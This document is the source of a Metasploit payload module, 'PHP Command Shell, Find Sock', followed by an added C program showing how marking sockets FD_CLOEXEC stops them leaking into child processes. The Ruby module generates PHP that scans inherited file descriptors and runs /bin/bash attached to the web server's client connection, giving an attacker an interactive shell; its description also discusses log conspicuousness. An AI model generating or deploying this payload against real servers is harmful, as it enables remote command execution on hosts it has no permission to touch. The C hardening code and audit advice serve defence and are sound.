GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/php/shell_findsock.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'PHP Command Shell, Find Sock',
      'Description' => %Q{
        Spawn a shell on the established connection to
        the webserver. Unfortunately, this payload
        can leave conspicuous evil-looking entries in the
        apache error logs, so it is probably a good idea
        to use a bind or reverse shell unless firewalls
        prevent them from working. The issue this
        payload takes advantage of (CLOEXEC flag not set
        on sockets) appears to have been patched on the
        Ubuntu version of Apache and may not work on
        other Debian-based distributions. Only tested on
        Apache but it might work on other web servers
        that leak file descriptors to child processes.
      },
      'Author' => [ 'egypt' ],
      'License' => BSD_LICENSE,
      'Platform' => 'php',
      'Handler' => Msf::Handler::FindShell,
      'Session' => Msf::Sessions::CommandShell,
      'Arch' => ARCH_PHP
    ))
  end

  def php_findsock

    var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
    var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
    var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
    shell = <<END_OF_PHP_CODE
#{php_preamble}
print("<html><body>");
flush();

function mysystem(#{var_cmd}){
  #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}
  return #{var_out};
}

#{var_fd} = 13;
for ($i = 3; $i < 50; $i++) {
  $foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
  if ($foo != $i) {
    #{var_fd} = $i - 1;
    break;
  }
}
print("</body></html>\n\n");
flush();

#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
mysystem(#{var_cmd});

END_OF_PHP_CODE


    return shell
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    return php_findsock
  end
end
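The module's description names the root cause it depends on: the web server's client socket is not marked close-on-exec, so it is inherited by the child processes PHP spawns. The C program below is an added example (not part of the Metasploit module or of Apache) showing the fix from the server side: mark the descriptor with FD_CLOEXEC and verify, by forking and exec'ing /bin/sh, that the descriptor no longer survives the exec. The helper names (fd_is_cloexec, set_cloexec, fd_survives_exec, socket_leaks_across_exec) are my own; the code assumes a POSIX system with /bin/sh and uses an AF_UNIX socket so it runs without network access.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return 1 if fd carries FD_CLOEXEC, 0 if it does not, -1 on error. */
int fd_is_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0)
        return -1;
    return (flags & FD_CLOEXEC) ? 1 : 0;
}

/* Mark fd close-on-exec so the kernel closes it across execve().
 * Returns 0 on success, -1 on error. (On Linux, SOCK_CLOEXEC on socket()
 * or accept4() does the same thing atomically, without a fork/exec race.) */
int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* Fork, exec /bin/sh, and ask it whether descriptor fd is still open after
 * the exec: the shell builtin ":" exits 0 only if "<&fd" can be duplicated.
 * Returns 1 if the exec'd child inherited fd, 0 if it did not, -1 on error. */
int fd_survives_exec(int fd)
{
    char cmd[64];
    snprintf(cmd, sizeof cmd, ": <&%d", fd);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: silence the shell's "Bad file descriptor" message, then exec. */
        int devnull = open("/dev/null", O_WRONLY);
        if (devnull >= 0) {
            dup2(devnull, STDOUT_FILENO);
            dup2(devnull, STDERR_FILENO);
        }
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127); /* exec itself failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (!WIFEXITED(status) || WEXITSTATUS(status) == 127)
        return -1;
    return WEXITSTATUS(status) == 0 ? 1 : 0;
}

/* Create a socket (AF_UNIX, so no network is needed), optionally harden it
 * with FD_CLOEXEC, and report whether an exec'd child can still reach it.
 * Returns 1 if the socket leaked into the child, 0 if it was closed, -1 on error. */
int socket_leaks_across_exec(int harden)
{
    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock < 0)
        return -1;
    int rc = harden ? set_cloexec(sock) : 0;
    int leaked = (rc < 0) ? -1 : fd_survives_exec(sock);
    close(sock);
    return leaked;
}

/* Sanity check of the flag helpers on a fresh socket: the flag must read as
 * 0 before set_cloexec() and 1 after it. Returns 1 if both hold, else 0. */
int cloexec_helpers_ok(void)
{
    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock < 0)
        return 0;
    int before = fd_is_cloexec(sock);
    int after = (set_cloexec(sock) == 0) ? fd_is_cloexec(sock) : -1;
    close(sock);
    return before == 0 && after == 1;
}

int main(void)
{
    printf("plain socket visible to exec'd child:      %d\n", socket_leaks_across_exec(0));
    printf("FD_CLOEXEC socket visible to exec'd child: %d\n", socket_leaks_across_exec(1));
    return 0;
}
```

The same fd_is_cloexec() check, run over /proc/self/fd (or by attaching to a server worker with a debugger) is a quick audit of which descriptors a server would hand to anything it execs; for PHP run under Apache the defensive fix lives in the server, not in the PHP code.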